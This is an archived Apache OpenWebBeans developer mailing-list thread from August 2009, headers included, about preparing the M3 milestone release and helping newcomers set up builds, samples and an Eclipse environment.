bh=3tPwjB6bDrj8Uwkda8NKb5xpJtcNiEbgMGZ0837G9ZQ=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=BTXo7P/bDAYfja85E+VCUSyIILzSf3q1dVd6OIbPL9Sj7wvX2yCPDM4fR5l45SrbCLw9H0jw/1y0xemqCEw3z2LtZQGtJVp58t7J7qa17RI1PYhRk+tCZSzAYCkkBCI2jzh/V7VteuKE2JZmM7Y+cakNgNHqjw1Oeh7uao21oNM= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=4rOU8BJMg0tmqx/OqdV+WN/UIm6TwASeJMHgDLcuG6fa81gMXUMI0/kpwn/2lYftxEqOzxZfeqwjk3vXhuZiEQcpf1Go3ZaYx93pjy0NzwjwI6KsxaVX/NLx3z8qXJBcwFMlA5by0NmRuOvjgfn4Vvw02TXIF+H/1cifH1flCSY=; Message-ID: <[email protected]> X-YMail-OSG: Fsvj4uAVM1k4C6dUCuYI_582JS0M7YCICinu_7R5GTMGK9tKXdVOLOAqa8VZFI.0Z_i6JmtEjHEGAGxnZ6_V.4uGMD_SsFbhzWLWyI2enXdjUgWTsRAdNQKRonCjiEl8Nv1Fbf7a4Shjg4CVOq6KxiIJcL.iOK7DpInT.L5tF0a66k2YTBtX_cw1zx.BFODyYoTmMiSpTCLRmJBUuPSD3vtJHtOc9Fm0and9tYmnggpAGJO.U410hkjwRJJ7s_sLjdmLZFNJ0FoAkcduvaDXBYbJqY.D8ZAfSn_q1WvXAZTKi1PSSvvQHSdusuiAWppZoRs- Received: from [161.129.204.104] by web38208.mail.mud.yahoo.com via HTTP; Sun, 16 Aug 2009 13:18:13 PDT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 Date: Sun, 16 Aug 2009 13:18:13 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Preparing for Release M3 To: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1933132964-1250453893=:92959" X-Virus-Checked: Checked by ClamAV on apache.org --0-1933132964-1250453893=:92959 Content-Type: text/plain; charset=us-ascii Hi guys; I want to release M3 in this week to include EJB functionality and couple of bug fixes. Also adding more documentation. WDYT? Thanks; --Gurkan --0-1933132964-1250453893=:92959-- From [email protected] Sun Aug 16 20:27:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22818 invoked from network); 16 Aug 2009 20:27:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Aug 2009 20:27:12 -0000 Received: (qmail 58266 invoked by uid 500); 16 Aug 2009 20:27:19 -0000 Delivered-To: [email protected] Received: (qmail 58233 invoked by uid 500); 16 Aug 2009 20:27:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58221 invoked by uid 99); 16 Aug 2009 20:27:19 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 16 Aug 2009 20:27:19 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27808.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 16 Aug 2009 20:27:07 +0000 Received: (qmail 4612 invoked by uid 60001); 16 Aug 2009 20:26:46 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1250454406; bh=seDf/9fFbaEdXjA9lfbx3XLXhmKfbIm7mmQoKBXhm7A=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=HoL2O+GiyUWfih5RkH0Z+9C50ymdWVIWzmTL7uLG7suhxFpY5sM7FlSqvCetsQ1jAPzHlweueUkz0aHKcPzRLmlJUS7XWup4zebaXQ77qXyCTukJqi4DXkX6Lu2WO1Pow/GlicMMmkANSxNU0L24Rf2oU6zwEbO1Ceur58AFu8g= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=axvU4Dxq95ZOIlPe48IDzh33u+YrGPCSPXCBlDyJ/VBEbmuwjVgRp+PUkbKo1AN/yIYwD3KmFSpODQjNiMCFlMpaO14mBRviRiHZCqfOFOq+mNL5qVAy52g61lmVOUd3wLdbSHXltRwQOKgLLtszJoiDa5hnMDJqlfsElYN5oAo=; Message-ID: <[email protected]> X-YMail-OSG: xUZ1h7UVM1lUVsemvS80lSqvG_KPKk.WeJSJM9ruwfpAUsUtNXJbyRvtMmJ43VWGOq0Mdc0xVFDCqBITFJ1JWWsCIftyvcynpwYNGprc4BUy1hBSHDwD1ii5h_2JEjxlz7CADJbMZBYNd.0g5utQVb6G_m2IVyrkOaET7rVEVKgHOHLtqVCWfokHDPoApijoQdIKSZWmsu0WCYHHvWD2cTiJ8tkVEAqxsekLZ6PQ8F41kcW2BzcxBGJCWamF3vcfxcnZ1deoMYDdJdIARZf7_yVMDiuXfLLl8jUwPWVHGelQKuwQsOZtd8WvjrdrVP4TzDSq7Uz7NsoonuhAtd.ujrln7LKpzUEehI8- Received: from [161.129.204.104] by web27808.mail.ukl.yahoo.com via HTTP; Sun, 16 Aug 2009 20:26:45 GMT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 References: <[email protected]> Date: Sun, 16 Aug 2009 20:26:45 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: Preparing for Release M3 To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org Hi Gurkan! Good idea. I talked with Pete a few days ago. He told me that there will most probably be a few changes again for the JSR-330 integration. But until we get the next officially released spec this would be a good time to release M3. LieGrue, strub PS: I had problems starting the guess sample with mvn clean package -Pjetty jetty run. Need to fix a few things in maven-scm now, and will look at it on thuesday. gn8! ----- Original Message ---- > From: Gurkan Erdogdu <[email protected]> > To: [email protected] > Sent: Sunday, August 16, 2009 10:18:13 PM > Subject: Preparing for Release M3 > > Hi guys; > > I want to release M3 in this week to include EJB functionality and couple of bug > fixes. Also adding more documentation. > > WDYT? > > Thanks; > > --Gurkan From [email protected] Sun Aug 16 20:58:38 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28526 invoked from network); 16 Aug 2009 20:58:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Aug 2009 20:58:38 -0000 Received: (qmail 79381 invoked by uid 500); 16 Aug 2009 20:58:44 -0000 Delivered-To: [email protected] Received: (qmail 79360 invoked by uid 500); 16 Aug 2009 20:58:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79350 invoked by uid 99); 16 Aug 2009 20:58:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 16 Aug 2009 20:58:44 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web38203.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 16 Aug 2009 20:58:33 +0000 Received: (qmail 13048 invoked by uid 60001); 16 Aug 2009 20:58:11 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1250456291; bh=G8UOrmAjbxoLrUhoKVxahj6NcqU38snXCZerFkUa4SY=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=qRQDOKEmTMw7pbS0WcQj0ua60vqxNgyTsuzNg635px2RrU7pBTtxLL9DzeP7OTe/EnU7PAVMEJmyWtoghShbKikqoqRMVQhwWY9FAjPvIog7H3IcjOGqCFBpwuqOUf9uHnlFkLOMeg+oeTi7ZtM9z8WHL1BkOW/Uz5lIOdMPQtQ= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=kv0rpfk3n1C0M880DOVXkL6fk7o87p4pCBEECMknLBX11g8c9AzS9ibCQMZzfuAOUCSdk2RFIm9nNkRtz6k9U0xkn0hH6mXszGqSabR7Lz6bsHp8L95mHSi6FoCMS3hdgzf2Pcl9Nl56/kTH45srB2K/fI2tRccs8Mhtvn7ugnI=; Message-ID: <[email protected]> X-YMail-OSG: ZbOxBK4VM1lBgpag1CdDNcYpQ3alNBi6a0q4RByQ4dZMVyGnJC.lrsmDbqx7ggb9_W1iEDh55ukw9gTwS2A.WuWcxkCL3OtqjngGQLIYiKs7nZuya2UheqVN5.m4Ps4guP8d_8ZiQdYx_sxxJtFxsRR10q.vudvyjgCqiJpR2C8HI34X_vd30nxRyHOFUNzv6rp9Fv2Blw9vmliH6oPHLIHoICY4xGu6jPUgAMEmGKP0cyeZ4FGmMeGHZ6GHJp7seXMySa9qy6VCUSwIc_yNsjU3.hxBkJ_Aw730ySbatRonJbu0ixLYlBVqtRduMrFYHZfrpMxTEmQQ_I.oq8Z7Ud5xlUYNiVMW4eLV Received: from [161.129.204.104] by web38203.mail.mud.yahoo.com via HTTP; Sun, 16 Aug 2009 13:58:11 PDT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 References: <[email protected]> <[email protected]> Date: Sun, 16 Aug 2009 13:58:11 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Re: Preparing for Release M3 To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1846137007-1250456291=:99437" X-Virus-Checked: Checked by ClamAV on apache.org --0-1846137007-1250456291=:99437 Content-Type: text/plain; charset=us-ascii >>PS: I had problems starting the guess sample with mvn clean package -Pjetty jetty run. Need to fix a few things in maven-scm now, and will look at it on >>thuesday. gn8! I have separated guess/ project into three different modules guess --> for guess sample, removing ejb and jms parts ejb-sample --> using OpenEJB in Tomcat. Have to configure Tomcat with OpenEJB firstly. Then deploy it into Tomcat. It does not work on any other containers like Jetty. jms-sample --> jms injections. Have to deploy it into full blown Java EE server supporting JMS provider. JMS sample currently using "ConnectionFactory" as JMS Connection Factory JNDI. You can also change this with respect to application server JMS JNDI name policy via openwebbeans.properties I run mvn clean package -Pjetty and mvn jetty:run -Pjetty. It works for me. Please ensure that, you check in all recent changes from the svn, and mvn clean install from root folder. Thanks; --Gurkan ----- Original Message ---- > From: Gurkan Erdogdu <[email protected]> > To: [email protected] > Sent: Sunday, August 16, 2009 10:18:13 PM > Subject: Preparing for Release M3 > > Hi guys; > > I want to release M3 in this week to include EJB functionality and couple of bug > fixes. Also adding more documentation. > > WDYT? > > Thanks; > > --Gurkan --0-1846137007-1250456291=:99437-- From [email protected] Mon Aug 17 20:59:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98894 invoked from network); 17 Aug 2009 20:59:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Aug 2009 20:59:56 -0000 Received: (qmail 23055 invoked by uid 500); 17 Aug 2009 21:00:02 -0000 Delivered-To: [email protected] Received: (qmail 23025 invoked by uid 500); 17 Aug 2009 21:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23015 invoked by uid 99); 17 Aug 2009 21:00:02 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 17 Aug 2009 21:00:02 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO Mail.MeepZor.Info) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 17 Aug 2009 20:59:51 +0000 Received: by Mail.MeepZor.Info (Postfix, from userid 506) id B3C6942D6C; Mon, 17 Aug 2009 16:59:29 -0400 (EDT) X-Spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on Bromine.MeepZor.Com X-Spam-Level: Received: from mercury.Reders (cpe-069-134-137-245.nc.res.rr.com [161.129.204.104]) by Mail.MeepZor.Info (Postfix) with ESMTP id 08C7642D60 for <[email protected]>; Mon, 17 Aug 2009 16:59:24 -0400 (EDT) Message-ID: <[email protected]> Date: Mon, 17 Aug 2009 16:59:16 -0400 From: "Paul J. Reder" <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:161.129.204.104) Gecko/20090814 Fedora/3.0-2.6.b3.fc11 Thunderbird/3.0b3 MIME-Version: 1.0 To: [email protected] Subject: Re: Preparing for Release M3 References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, score=-1.2 required=5.0 tests=AWL,BAYES_00,RCVD_IN_PBL, RCVD_IN_SORBS_DUL,RDNS_DYNAMIC autolearn=no version=3.2.4 I've been trying, along with a couple of co-workers, to import OpenWebBeans into an eclipse environment and run the tests. I've encountered the mentioned issue: [ERROR] BUILD ERROR [INFO] ------------------------------------------------------------------------ [INFO] The plugin 'org.apache.maven.plugins:maven-jetty-plugin' does not exist or no valid version could be found when running: mvn jetty:run -Pjetty after having checked out the latest svn trunk and run: mvn clean install mvn clean package -Pjetty Is it possible you have a local copy of maven-jetty-plugin? We'd love to start helping with OpenWebBeans development, but we could really use some help getting a working environment set up and figuring out what we can do to help. - Are all current work items in jira OWB? Are there some we can help with? - What is the procedure to set up an environment to run the tests and do development using eclipse? (i.e. what libs/levels need to be installed, are there project files we can import to generate a standard dev env, etc) - What are the current plans for handling the separation of JSR-330 and update the open web beans code to accommodate the changes? - Will we be making OWB dependency injection pluggable so folks can pick whatever implementation they want or will we be linking it in directly (regardless of whether we write or obtain the code)? If you can help us get started, we'd love to help. Paul J. Reder On 08/16/2009 04:58 PM, Gurkan Erdogdu wrote: > >>> PS: I had problems starting the guess sample with mvn clean package -Pjetty jetty run. Need to fix a few things in maven-scm now, and will look at it on>>thuesday. gn8! > > I have separated guess/ project into three different modules > > guess --> for guess sample, removing ejb and jms parts > > ejb-sample --> using OpenEJB in Tomcat. Have to configure Tomcat with OpenEJB firstly. Then deploy it into Tomcat. It does not work on any other containers like Jetty. > > jms-sample --> jms injections. Have to deploy it into full blown Java EE server supporting JMS provider. JMS sample currently using "ConnectionFactory" as JMS Connection Factory JNDI. You can also change this with respect to application server JMS JNDI name policy via openwebbeans.properties > > I run mvn clean package -Pjetty and mvn jetty:run -Pjetty. It works for me. > > Please ensure that, you check in all recent changes from the svn, and > > mvn clean install from root folder. > > Thanks; > > --Gurkan > > ----- Original Message ---- >> From: Gurkan Erdogdu<[email protected]> >> To: [email protected] >> Sent: Sunday, August 16, 2009 10:18:13 PM >> Subject: Preparing for Release M3 >> >> Hi guys; >> >> I want to release M3 in this week to include EJB functionality and couple of bug >> fixes. Also adding more documentation. >> >> WDYT? >> >> Thanks; >> >> --Gurkan > > > -- Paul J. Reder ----------------------------------------------------------- "The strength of the Constitution lies entirely in the determination of each citizen to defend it. Only if every single citizen feels duty bound to do his share in this defense are the constitutional rights secure." -- Albert Einstein From [email protected] Mon Aug 17 22:11:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23027 invoked from network); 17 Aug 2009 22:11:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Aug 2009 22:11:19 -0000 Received: (qmail 8578 invoked by uid 500); 17 Aug 2009 22:04:59 -0000 Delivered-To: [email protected] Received: (qmail 8546 invoked by uid 500); 17 Aug 2009 22:04:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8536 invoked by uid 99); 17 Aug 2009 22:04:59 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 17 Aug 2009 22:04:59 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 17 Aug 2009 22:04:49 +0000 Received: by ewy4 with SMTP id 4so2159141ewy.27 for <[email protected]>; Mon, 17 Aug 2009 15:04:27 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=4nFd34aw3yDsT3SK1me3RvawvBDQ9ckcSUWPb5sHKtc=; b=ed5u3E1zZ2NglXV6ZgU5D84uR6UV6Gg2GB/EAXTfR3JTAj+cMVw3e99H5Q5C4udMy2 SqBKoFoe68qQRU9YyS6qEHkpX31SUpdPG/w89uCB57EaOG4iLLZ4S2l28msNS+0xgD10 xJjrrFolQyY8XTD7yVDYGsAUfVbyX1vgozkzQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=BcDgH7Ho8DLyjE2VKT79I2UwEX9nQIy2mtxS783k7bLnc61MWmEtsBgNIsY2HxPvPg afYGT7DXHIL0sB6tmZIYeshIvgeRzMaSFIgBN9fam1QdK9ajjf6n4pbj5Vl0LYqVDJyy 5+JMD8aHsGm0ldwvdCLHFTa6Liy0fRG87DH2Y= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id l16mr3871378ebc.56.1250546667635; Mon, 17 Aug 2009 15:04:27 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Tue, 18 Aug 2009 01:04:27 +0300 Message-ID: <[email protected]> Subject: Re: Preparing for Release M3 From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c18eae6455604715d95f4 X-Virus-Checked: Checked by ClamAV on apache.org --0015174c18eae6455604715d95f4 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hi Paul; Thanks for trying to help. >>>Is it possible you have a local copy of maven-jetty-plugin? I removed maven-jetty-plugin from my local repository, then re-execute mvn commands. Maven try to get plugin from the below locations. [INFO] Scanning for projects... [INFO] Searching repository for plugin with prefix: 'jetty'. Downloading: http://repo1.maven.org/maven2/org/mortbay/jetty/maven-jetty-plugin/6.1.18/maven-jetty-plugin-6.1.18.pom 5K downloaded Downloading: http://repo1.maven.org/maven2/org/mortbay/jetty/maven-jetty-plugin/6.1.18/maven-jetty-plugin-6.1.18.jar 46K downloaded >>>Are all current work items in jira OWB? Are there some we can help with? Yes. We are planning to release M3 version. But some of the issues under M3 may propagate to M4 version. FYI, JSR-299 specification talks about heavy Java EE containers for some of its functionality. But instead OWB works in Jetty, Tomcat etc. light weight containers. But it also supports Embeddable OpenEJB in Tomcat. You can pick any of the issue from the JIRA, https://issues.apache.org/jira/browse/OWB. Currenlty we are trying to support resource injection for managed beans in Embeddable OpenEJB. (OWB-47). All jira issues explains themselves. If you have further question about them, you are always welcome to ask in this dev list. We are also running IRC@freenode with channel name #openwebbeans. >>>What is the procedure to set up an environment to run the tests and do development >>>using eclipse? (i.e. what libs/levels need to be installed, are there project files we can import to generate a >>>standard dev env, etc) We are generally use Eclipse for development with Maven Plugin. After you check out all of the source codes from SVN, use Eclipse Import Maven Project facility. That is it, you can begin development. Lots of tests are located in the src/main/test folders. You can run junit test from Eclipse or using mvn test. There is also samples directory. In it, you can find several full-blown web samples. For example, guess --> Simple web application using OWB Run it with : mvn clean install -Pjetty; mvn jetty:run -Pjetty; ejb-sample --> Shows usage of the OpenEJB within Tomcat. First of all, you have to install OpenEJB in Tomcat. You can look at the http://openejb.apache.org/tomcat.html for installation. After that put "openwebbeans-api.jar" into the tomcat server library (apache-folder/lib). Then deploy it into the ejb-sample.war to the tomcat "webapps/" folder (apache-folder/webapps). Currently we have no configuration to use examples via Tomcat Maven Plugin. There is also one trick to use MyFaces with Tomcat, put "jasper.jar" and "jasper-el.jar" to the WEB-INF folder of the application. I can not run application without this trick under Tomcat. You can directly export war from Eclipse Export War functionality. But, you must put jasper jars in it. jms-sample --> Shows the usage of JMS injections. It uses server JNDI functionality to get JMS ConnectionFactory etc. I tried it on several application servers. It requires full blown application servers or JMS configured lightweight containers. If you look at "src/main/resource/META-INF" folder, you see a file named with openwebbeans.properties. It defines several properties for overriding default configuration. OWB uses some default configuration for its services. You can find default configuration properties and their explanations from "webbeans-impl" project. jms-sample currently uses "ConnectionFactory" as JMS Connection Factory JNDI name. You can override it in openwebbeans.properties with property name #JMS ConnectionFactory JNDI Name org.apache.webbeans.spi.JNDIService.jmsConnectionFactoryJndi=ConnectionFactory. You can deploy it via war file. There is no currently maven deployer for it. reservation -->Full blown JSF + JPA + OWB sample. You can test it like guess sample mvn jetty:run -Pjetty; >>> What are the current plans for handling the separation of JSR-330 and update the open web beans code to >>>accommodate the changes? As I am in the EG of JSR-299, for the time being there is no more change in JSR 299. There are some couple of name changes so far. We will work on these changes after the final spec is arrived. We will also implement JSR-330 on top of OWB. >>>Will we be making OWB dependency injection pluggable so folks can pick whatever implementation they want or >>>will we be linking it in directly (regardless of whether we write or obtain the code)? Yes, OWB will fully implement specification of JSR-299, so anyone that uses JSR-299 API can changes its underliyng implementation without changing single line of code. But as I said, currentlty, we do not support any specific JAva EE container and no integration. You can use any lightweight JSP/Servlet container to use OWB. If you wish to use embeddable EJB support, you can also try to use OpenEJB TOmcat with OWB. There are lots of areas that you can help. It is documented in the JIRA. We are also happy to get any comments from your side. All of your contributions are welcome :) Thanks; --Gurkan 2009/8/17 Paul J. Reder <[email protected]> > I've been trying, along with a couple of co-workers, to import OpenWebBeans > into an eclipse environment and run the tests. I've encountered the > mentioned issue: > > [ERROR] BUILD ERROR > [INFO] > ------------------------------------------------------------------------ > [INFO] The plugin 'org.apache.maven.plugins:maven-jetty-plugin' does not > exist or no valid version could be found > > when running: > > mvn jetty:run -Pjetty > > after having checked out the latest svn trunk and run: > > mvn clean install > mvn clean package -Pjetty > > Is it possible you have a local copy of maven-jetty-plugin? > > We'd love to start helping with OpenWebBeans development, but we could > really use some help getting a working environment set up and figuring out > what we can do to help. > > - Are all current work items in jira OWB? Are there some we can help with? > - What is the procedure to set up an environment to run the tests and do > development > using eclipse? (i.e. what libs/levels need to be installed, are there > project files we can import to generate a standard dev env, etc) > - What are the current plans for handling the separation of JSR-330 and > update the open web beans code to accommodate the changes? > - Will we be making OWB dependency injection pluggable so folks can pick > whatever implementation they want or will we be linking it in directly > (regardless of whether we write or obtain the code)? > > If you can help us get started, we'd love to help. > > Paul J. Reder > > > > On 08/16/2009 04:58 PM, Gurkan Erdogdu wrote: > >> >> PS: I had problems starting the guess sample with mvn clean package >>>> -Pjetty jetty run. Need to fix a few things in maven-scm now, and will look >>>> at it on>>thuesday. gn8! >>>> >>> >> I have separated guess/ project into three different modules >> >> guess --> for guess sample, removing ejb and jms parts >> >> ejb-sample --> using OpenEJB in Tomcat. Have to configure Tomcat with >> OpenEJB firstly. Then deploy it into Tomcat. It does not work on any other >> containers like Jetty. >> >> jms-sample --> jms injections. Have to deploy it into full blown Java EE >> server supporting JMS provider. JMS sample currently using >> "ConnectionFactory" as JMS Connection Factory JNDI. You can also change this >> with respect to application server JMS JNDI name policy via >> openwebbeans.properties >> >> I run mvn clean package -Pjetty and mvn jetty:run -Pjetty. It works for >> me. >> >> Please ensure that, you check in all recent changes from the svn, and >> >> mvn clean install from root folder. >> >> Thanks; >> >> --Gurkan >> >> ----- Original Message ---- >> >>> From: Gurkan Erdogdu<[email protected]> >>> To: [email protected] >>> Sent: Sunday, August 16, 2009 10:18:13 PM >>> Subject: Preparing for Release M3 >>> >>> Hi guys; >>> >>> I want to release M3 in this week to include EJB functionality and couple >>> of bug >>> fixes. Also adding more documentation. >>> >>> WDYT? >>> >>> Thanks; >>> >>> --Gurkan >>> >> >> >> >> > -- > Paul J. Reder > ----------------------------------------------------------- > "The strength of the Constitution lies entirely in the determination of > each > citizen to defend it. Only if every single citizen feels duty bound to do > his share in this defense are the constitutional rights secure." > -- Albert Einstein > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c18eae6455604715d95f4-- From [email protected] Tue Aug 18 06:21:01 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39196 invoked from network); 18 Aug 2009 06:21:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Aug 2009 06:21:01 -0000 Received: (qmail 67666 invoked by uid 500); 18 Aug 2009 06:21:20 -0000 Delivered-To: [email protected] Received: (qmail 67649 invoked by uid 500); 18 Aug 2009 06:21:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67639 invoked by uid 99); 18 Aug 2009 06:21:20 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Aug 2009 06:21:20 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27802.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 18 Aug 2009 06:21:07 +0000 Received: (qmail 4454 invoked by uid 60001); 18 Aug 2009 06:20:46 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1250576446; bh=T/HKimmRrxdGjATLZYa2YEnhD11UgoTKJ5MFyZjC1Ko=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=tDEqSnfDufRCQdsCYm3TOg6rZzozKxivEBlTGdn2FypAETEwTxRegV94KAf0KhNomsQnkWa2BdHfHyDfe2GSLTm0q8YP7DB7o8UGGE5jsY4DRa8Mu3ER8qj1rG4Gc6d7OnNDk39xmkT6bP5kEnl3da17+a7GEmGf+xZFwFHvHFo= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=EB/JLW82wk6H/aBZMm0H8zt+PjrFkNVW4/nsCToVHchfGlihCZ+2ksphGR1iia3S1cyBSmrLNJunn0e8yzewd8Kl5vOC6evoJLDSvrgGODcZLG9IBDD1+jEYE8acBizFHe6HZ0A13pezwuJpy4HOISb3xHVmyfRQ5GMZlUjVxHc=; Message-ID: <[email protected]> X-YMail-OSG: erVGLU8VM1ltQ9P_kBLMsdY6u9UqMt.8sZduku4Bw9eDycJ9KA3636y5oqFBQFI754wcqKFIWCM6ubjTozdTVhV.av7KCdVIHSEnMpOo0X3fQWTiXSA.rnVZpmqILtgh4E9z1OGr9mNxSCDFOMvnB4jSA..rFgsIdsPTy483S4x.A6Si6tvNm9oB8cZ7RbAyen55mMXPSImX5OyWJhF9bXIvlVRuvBkPhrUuq7lH_JKImGtE4DeEySDo8kPfDaPrqYI6rHlvNc1sOhZAbyfsYvEDnCLOfDvEk833kWRv3mKJW7zPhSRLmaTi0_7f4D7c.TnxNeWGTsj2.rt.QgVa8CKx906jt_Oe6uYyS0zIVw-- Received: from [161.129.204.104] by web27802.mail.ukl.yahoo.com via HTTP; Tue, 18 Aug 2009 06:20:45 GMT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> 